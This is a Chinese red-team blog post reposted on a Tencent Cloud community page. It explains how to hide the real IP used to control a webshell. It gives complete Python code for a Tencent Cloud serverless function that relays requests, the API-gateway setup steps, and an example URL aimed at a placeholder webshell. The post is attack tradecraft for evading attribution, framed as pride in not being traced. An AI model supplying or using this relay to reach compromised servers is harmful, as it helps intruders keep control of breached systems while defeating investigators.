首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >【防溯源】如何优雅的隐藏你连接 Webshell 的真实 IP

【防溯源】如何优雅的隐藏你连接 Webshell 的真实 IP

作者头像
渗透攻击红队
发布2021-08-06 10:30:31
发布2021-08-06 10:30:31
2.1K00
代码可运行
举报
文章被收录于专栏:漏洞知识库漏洞知识库
运行总次数:0
代码可运行

大家好,这里是 渗透攻击红队 的第 64 篇文章,本公众号会记录一些红队攻击的案例,不定时更新

前言

用过云函数的 XD 们都知道,它可以用来帮助我们转发请求,但是这种方法已经被老外玩烂了,但是也很实用!由于它自带 CDN 这样我们每次请求 Webshell 的时候 IP 都是不同的,从而达到隐藏 RT 的效果!还是那句话,一个合格的 RedTeam 被溯源到是很可耻的!

如何优雅的隐藏你连接 Webshell 的真实 IP

云函数隐藏 Webshell 真实 IP

首先来到腾讯云后台找到云函数,我们使用自定义的模版:

然后依次点击函数服务->函数管理->函数代码,然后将下面的代码粘贴到 index.py 中:

代码语言:javascript
代码运行次数:0
运行
复制
# -*- coding: utf8 -*-
import requests
import json
def geturl(urlstr):
    jurlstr = json.dumps(urlstr)
    dict_url = json.loads(jurlstr)
    return dict_url['u']
def main_handler(event, context):
    url = geturl(event['queryString'])
    postdata = event['body']
    headers=event['headers']
    resp=requests.post(url,data=postdata,headers=headers,verify=False)
    response={
        "isBase64Encoded": False,
        "statusCode": 200,
        "headers": {'Content-Type': 'text/html;charset='+resp.apparent_encoding},
        "body": resp.text
    }
    return response

然后点击部署后,创建一个触发器:

这里需要选择 API网关触发:

然后就可以访问这个了:

代码语言:javascript
代码运行次数:0
运行
复制
https://service-gh2cn6ys-xxxxx.gz.apigw.tencentcs.com/release/saulGoodman

这个时候 u 参数后面就是你的一句话:http://111.111.111.111/saulGoodman.php

代码语言:javascript
代码运行次数:0
运行
复制
https://service-gh2cn6ys-xxxxx.gz.apigw.tencentcs.com/release/saulGoodman?u=http://111.111.111.111/saulGoodman.php

这个时候每次访问 webshell 的 IP 都不一样!从而隐藏了 RT 的真实 IP!


参考文章:

https://blog.csdn.net/qq_41918771/article/details/114359458

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-07-25,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 渗透攻击红队 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档